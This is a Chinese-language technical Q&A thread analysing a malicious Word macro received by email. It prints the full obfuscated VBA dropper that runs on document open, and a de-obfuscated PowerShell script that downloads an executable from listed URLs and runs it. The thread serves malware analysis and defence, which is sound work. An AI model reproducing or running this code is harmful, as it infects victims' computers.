
这个visualbasic代码是做什么的?Microsoft word宏

  • TheStrangeQuark  · 技术社区  · 6 年前

    我收到一封电子邮件,里面有一个word文档,里面有一些内置宏。我禁用了它们并检查了它们。这些代码看起来都是胡言乱语,但也许其他人能帮我弄清楚它在做什么?

    ' Entry point of the dropper: Word fires Document_open automatically when the
    ' document is opened (assumes this sits in the ThisDocument module), so the
    ' payload runs without any further user interaction beyond enabling macros.
    Private Sub Document_open()
    ' "On Error Resume Next" broken across line continuations so the statement
    ' is not one easily matched token. It swallows the runtime error raised by
    ' every "Second ..." decoy call below, which is what lets them do nothing.
    On _
    Error _
    Resume _
    Next
       ' Decoy: VBA's Second(time) is fed a meaningless string, which raises a
       ' runtime error (ignored) and has no effect. Pure noise to confuse AV.
       Second "zFpiVaXZHXwfhz" + "U" + "2692" + "Zt"
       Second "uqwSRYVhz" + "387021345" + "kzB" + "8730"
       Second "kz" + "1499" + "tkAh" + "p"
       Second "P" + "8389"
       Second "4180" + "jmCmdHzM" + "IcRbPsSnK" + "bWtnR"
       Second "357881955" + "3117" + "ijHmwpiFZCcjw" + "bvt"
    ' The only statement that matters: the three module functions each return a
    ' fragment of an obfuscated "cmd /V:O /C ..." command line (de-obfuscated in
    ' the accepted answer); Shell launches it in a hidden window (vbHide).
    ' Detection hint: a WINWORD.EXE process spawning cmd.exe is the observable here.
    Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)
       ' More decoys; they run after the payload has already been launched.
       Second "pqENJzbA" + "208599822" + "Ovav" + "A"
       Second "HmjZtUmz" + "7073"
       Second "hYRErMnn" + "4277"
    End Sub
    

    这是在模块上:

    ' Returns the FIRST fragment of the obfuscated command line launched by
    ' Document_open. Obfuscation techniques visible in this function:
    '   - every literal is split into short pieces joined with "+";
    '   - "^" (the cmd.exe escape character, dropped by the shell) is sprinkled
    '     between characters so no recognisable keyword appears in the source;
    '   - sensitive characters are produced via Chr() on a sum of constants:
    '     Chr(9+16+4+2+68) = Chr(99) = "c", Chr(6+11+3+1+46) = Chr(67) = "C",
    '     Chr(3+5+1+0+25) = Chr(34) = the double quote. Format() around them
    '     is effectively a no-op string conversion.
    ' Most of the PowerShell text is stored reversed (see the accepted answer);
    ' the for /L loop in bMdNCkVCVn reverses it back at run time.
    Function KlXaMrm()
    
    ' Swallows the runtime errors raised by the "Second ..." decoy calls.
    On _
    Error _
    Resume _
    Next
    ' Decoy calls: runtime error, no effect (see Document_open).
    Second "IVozFsCNdj" + "muE"
       Second "wwrMmsOX" + "ii"
       Second "7048" + "RLBLOvif"
       Second "315289259" + "bGl" + "wcZUd" + "8842"
    ' Decodes to: cmd /V^:O/C"^s^e^t ^WvU^y=...  -- i.e. cmd with delayed
    ' expansion (/V:O) running a quoted command that first sets variable WvUy.
    bkzhl = Format(Chr(9 + 16 + 4 + 2 + 68)) + "md /V" + "^:O/" + Format(Chr(6 + 11 + 3 + 1 + 46)) + Format(Chr(3 + 5 + 1 + 0 + 25)) + "^" + "s^" + "e^" + "t ^WvU^" + "y=^  " + " ^  ^ " + "^   " + "^   ^ "
    Second "IWV" + "FalMBYmN" + "6772" + "vIi"
       Second "BfMwfQziXwj" + "fvQGQha"
       Second "hBcrV" + "380436099"
    ' From here on: the reversed PowerShell downloader text (try/catch, break,
    ' Invoke-Item, DownloadFile, foreach ...), one chunk per variable.
    ipaSHnJ = " " + "^ ^ ^ " + "}" + "}" + "^{" + "^h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^" + "ta" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "};" + "^k^a^"
    Second "31392559" + "BMS"
    kVaBhn = "e" + "r^b;Yu" + "r^$ " + "^m^e^tI" + "^-e" + "k" + "o" + "vnI^;"
    Second "965" + "5880" + "XJTdjHJSV" + "Abrh"
    HzutiHjFO = ")Y^u" + "r^" + "$ ^,^pN" + "B^" + "$" + "(^eliF" + "d"
    Second "E" + "5438"
       Second "MhjZXFtjz" + "52832268"
    zBPwbjSP = "^a" + "^olnwoD" + ".j^" + "p^X$^{^" + "yr"
    Second "oWcn" + "1454"
       Second "UmZTRVGRUadD" + "7070" + "Hb" + "Z"
       Second "GiNa" + "EjiBfz"
       Second "ZLiR" + "iSRc" + "LaHCfQjrI" + "467392171"
       Second "376971481" + "ATq"
    wZvZZZCL = "^t{" + ")" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi$^" + " n^i" + "^" + " ^pN" + "B^$(h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^a" + "^e" + "r^o^f^;" + "'" + "^e^x^e"
    Second "1426" + "2730" + "131359904" + "2661"
       Second "tZ" + "A"
    ' Reversed: the drop path "$env:public + '\' + $waf + '.exe'".
    FVkwvLXivOm = "^.^'+^f" + "aw" + "^$+" + "'\'^+" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "i^" + "l" + "^" + "b^u^p:v"
    Second "obmhCVWdl" + "1876"
    ' Reversed: "$waf='711'" and the ".Split('@')" on the URL list.
    LEFDwJt = "n" + "e^$^=Y" + "^ur^$;'" + "^1^" + "1^7" + "^' =^ " + "f^aw$;" + ")^'@^" + "'(" + "t" + "ilp^S.^"
    Second "mHz" + "2845" + "swVQqO" + "sTaM"
       Second "151506295" + "9519"
       Second "530531760" + "421003665" + "33902179" + "zE"
    ' Reversed tail of the '@'-separated download URL list (IoCs are listed
    ' in clear text in the accepted answer's de-obfuscated script).
    UjhKfLskOAw = "'^" + "D^GoP/" + "m" + "^o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "^t"
    Second "1424" + "AS" + "qWRt" + "jTfL"
       Second "144" + "385570591" + "YNItdvcRQLGKl" + "273801574"
       Second "8474" + "427918883" + "101014623" + "2181"
    oHsEGJKpH = "^o" + "^p^" + "sno" + "r^i" + "//:p^t" + "t^h^@j" + "fW^FVF^" + "8r/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "e^u" + "v" + "^"
    Second "LIdEK" + "9208"
       Second "GHY" + "w"
       Second "licB" + "57965560" + "BkiEX" + "uNEQdXXBb"
    wIVBCzu = "ero^o^" + "b" + "a^keep" + "/" + "/^:^p^"
    ' Return value: all chunks concatenated in source order.
    KlXaMrm = bkzhl + ipaSHnJ + kVaBhn + HzutiHjFO + zBPwbjSP + wZvZZZCL + FVkwvLXivOm + LEFDwJt + UjhKfLskOAw + oHsEGJKpH + wIVBCzu
       Second "kmpQXLAuN" + "fh" + "365194270" + "n"
       Second "70996280" + "nJ"
       Second "QTviGhI" + "RV" + "315865801" + "UcJFQ"
    End Function
    ' Returns the SECOND fragment of the obfuscated command line (same
    ' obfuscation tricks as KlXaMrm: split literals, "^" cmd escapes, Chr() sums,
    ' decoy "Second" calls). It carries the rest of the reversed URL list, the
    ' reversed "$Xpj=new-object Net.WebClient" / "powershell $..." text, and --
    ' in clear -- the cmd "for /L" loop that reverses variable WvUy back into
    ' variable 31 and then "call"s the result.
    Function bMdNCkVCVn()
    
    ' Swallows the runtime errors raised by the "Second ..." decoy calls.
    On _
    Error _
    Resume _
    Next
    Second "FddKlw" + "OTSBodYZZ"
    ' Reversed URL fragments (continuation of the '@'-separated list).
    PpRpwRnf = "tth^" + "@uj^l^" + "h^o" + "/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.^" + "gn" + "^it" + "nia^p"
    Second "wCkfREKOG" + "AfRUmpAd" + "WL" + "GICb"
       Second "rBzjjYzi" + "zL"
    LOkOMzwwZEb = "m^ot^su" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ra" + "^" + "t^sen^" + "o" + "^l//^:" + "p^t^t" + "h"
    Second "rlTmjU" + "jYwjHViv" + "dqjiW" + "c"
       Second "WHUDRQuddUoQr" + "lIcDDYCTjsUVWs" + "4956" + "mJ"
       Second "9262" + "171867944" + "464524065" + "7760"
    WnITU = "^@u^A" + "/^ur.^m" + "b^s-t" + "^evs^" + "s" + "^ar" + "//^:p^t" + "th" + "@^F^p2G" + "^zx^W/^"
    Second "184947357" + "wjOV"
       Second "5399" + "jwuBT"
       Second "402560265" + "449" + "l" + "BBBuHZnMK"
       Second "MrA" + "nMwkzNbY" + "429759967" + "bqC"
    WsfkNBcA = "mo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.k" + "ro" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ege" + "l^lo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "sn" + "i" + "^t" + "r^a^mt^" + "s//" + ":p" + "^t" + "^"
    Second "534498195" + "HX" + "vwKkqLAvKmm" + "279702571"
       Second "KYJPBi" + "ivTUzZOfj" + "162850888" + "WbZ"
    ' Reversed: "$Xpj=new-object Net.WebClient;$ioc='http..." (WebClient is the
    ' download primitive; Chr(67) = "C" in "WebClient" is hidden via arithmetic).
    RqVln = "th'^=" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi^$" + ";^" + "t" + "n^e^i" + "^l" + Format(Chr(6 + 11 + 3 + 1 + 46)) + "be^W" + "^.t^e" + "N^ t" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ejb^o" + "-^w^e" + "n=" + "^j" + "pX^"
    Second "fbvS" + "F"
       Second "BmJt" + "Y"
       Second "z" + "qlRwULuPK" + "NE" + "2370"
       Second "467432993" + "510382039" + "V" + "357745589"
    ' Reversed "powershell $" closes the WvUy value; "&&fo" begins the for loop.
    TTWnMmnb = "$ ll^e" + "h^s" + "r^e^w^" + "o^p" + "&&" + "^f^o"
    Second "FQvcEKz" + "IN" + "419878734" + "aWRD"
       Second "Gs" + "qiWjuwsKkDzj"
       Second "w" + "iZv" + "ri" + "jbl"
    ' Clear text once "^" is stripped: for /L %5 in (373,-1,0) do set 31=!31!!WvUy:~%5,1!
    ' -- walks WvUy from index 373 down to 0, appending one char at a time,
    ' i.e. reverses the stored string into variable 31.
    HuAjss = "r /L" + " %^5" + " ^" + "in (^" + "37" + "^3,-" + "^1,^0)^" + "do s^e^" + "t" + " 3^1=!3"
    Second "IIz" + "pwb" + "OiIRoWEPKvRSu" + "fLYzMV"
       Second "I" + "5470" + "uC" + "vzYpG"
       Second "Prm" + "D"
    ' ... && if %5==0 call %31:*31!=%   -- on the last iteration, executes the
    ' rebuilt "powershell ..." command.
    vWYHrcNLA = "^" + "1!!" + "^WvU^y" + ":~%^5" + ",1!&" + "&i" + "^" + "f %^5" + "=^=^0" + " " + Format(Chr(9 + 16 + 4 + 2 + 68)) + "a^l^l"
    Second "QqFfMn" + "mmslG"
    fGbIAE = " " + "%3^1:" + "*^" + "3^1^" + "!^"
    ' Return value: all chunks concatenated in source order.
    bMdNCkVCVn = PpRpwRnf + LOkOMzwwZEb + WnITU + WsfkNBcA + RqVln + TTWnMmnb + HuAjss + vWYHrcNLA + fGbIAE
       Second "kWluI" + "lFK"
       Second "FoYWtEQUo" + "SPqoT" + "m" + "1515"
       Second "QHGQ" + "f"
    End Function
    ' Returns the THIRD (tail) fragment of the command line: the characters
    ' =%" plus two spaces. They finish the "%31:*31!=%" substitution and close
    ' the double quote opened after /C in KlXaMrm (Chr(3+5+1+0+25) = Chr(34)).
    Function zZZwVld()
    
    ' Swallows the runtime errors raised by the "Second ..." decoy calls.
    On _
    Error _
    Resume _
    Next
    Second "15045220" + "Cfku" + "finOQwh" + "mUISHvGpDwIp"
       Second "297480629" + "wXWqc"
       Second "RJ" + "1178" + "XfKGfw" + "znaVlIj"
    ' The trailing "" is an empty literal, another no-op padding trick.
    sFjEfzuO = "=%" + Format(Chr(3 + 5 + 1 + 0 + 25)) + "  " + ""
    zZZwVld = sFjEfzuO
       Second "7008" + "530276898"
    End Function
    

    我猜这是恶意的,但我对visualbasic不太熟悉。我也不确定这是不是问这个的合适地方。

    2 回复  |  直到 4 年前
  •   GSerg    6 年前

    所有以 Second 开头的行都是噪音：它们只会引发运行时错误（被前面的 On Error Resume Next 吞掉），不执行任何操作。它们的存在只是为了迷惑杀毒软件。

    如果把它们全部删除，剩下的就是一堆字符串赋值。把这些字符串拼起来，最后得到的是以下字符串：

    cmd /V^:O/C"^s^e^t ^WvU^y=^   ^  ^ ^   ^   ^  ^ ^ ^ }}^{^hc^tac};^k^a^er^b;Yur^$ ^m^e^tI^-ekovnI^;)Y^ur^$ ^,^pNB^$(^eliFd^a^olnwoD.j^p^X$^{^yr^t{)c^oi$^ n^i^ ^pNB^$(hc^a^er^o^f^;'^e^x^e^.^'+^faw^$+'\'^+ci^l^b^u^p:vne^$^=Y^ur^$;'^1^1^7^' =^ f^aw$;)^'@^'(tilp^S.^'^D^GoP/m^oc.^t^o^p^snor^i//:p^tt^h^@jfW^FVF^8r/m^oc.e^uv^ero^o^ba^keep//^:^p^tth^@uj^l^h^o/m^oc^.^gn^itnia^pm^ot^sucra^t^sen^o^l//^:p^t^th^@u^A/^ur.^mb^s-t^evs^s^ar//^:p^tth@^F^p2G^zx^W/^moc^.krocegel^locsni^tr^a^mt^s//:p^t^th'^=c^oi^$;^tn^e^i^lCbe^W^.t^eN^ tcejb^o-^w^en=^jpX^$ ll^eh^sr^e^w^o^p&&^f^or /L %^5 ^in (^37^3,-^1,^0)^do s^e^t 3^1=!3^1!!^WvU^y:~%^5,1!&&i^f %^5=^=^0 ca^l^l %3^1:*^3^1^!^=%"  

    这是一个 shell 命令：用开关 /V:O 和 /C:"<obfuscated command>" 运行 cmd。
    在 cmd 中，^ 是转义符，表示按字面意义取下一个字符，所以它本身不会出现在最终执行的命令里。

    命令里的 for /L 循环再把它反转回来并执行。

    最终执行的Powershell脚本是:

    # Second-stage payload as de-obfuscated in the answer above: a plain
    # download-and-execute dropper. Process chain to look for in endpoint
    # telemetry: WINWORD.EXE -> cmd.exe (/V:O /C) -> powershell.exe.
    $Xpj=new-object Net.WebClient;
    # IoC: five candidate download URLs, '@'-separated, tried in this order.
    $ioc='http://stmartinscollegecork.com/WxzG2pF@http://rassvet-sbm.ru/Au@http://lonestarcustompainting.com/ohlju@http://peekaboorevue.com/r8FVFWfj@http://ironspot.com/PoGD'.Split('@');
    $waf='711';
    # Drop path: %PUBLIC%\711.exe -- a location that is typically writable by
    # any local user, so no elevation is needed. Useful file-creation IoC.
    $ruY=$env:public + '\' + $waf + '.exe';
    foreach($BNp in $ioc) {
        try {
            $Xpj.DownloadFile($BNp, $ruY);   # fetch the executable from the current URL
            Invoke-Item $ruY;                # launch the downloaded .exe
            break;                           # stop after the first URL that succeeded
        }catch{}   # dead host / blocked download: swallow silently and try the next URL
    }
    

    它依次尝试从上面那些 URL 下载文件，保存到 public folder 作为 711.exe，然后运行它。第一次成功运行后就停止。

  •   Vityata    6 年前

    只要打开文档，代码就会运行（Document_open 是打开文档时自动触发的事件）。看起来确实是某种病毒，这是恶意行为。如果您想查看它到底要执行什么，请替换以下行：

    Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)

    使用:

    MsgBox KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)

    这样就能在 MsgBox() 中看到它要执行的命令，而不会真的运行它。或者最好连 Shell 这一行也直接删掉。之后你很可能还需要重装你的电脑。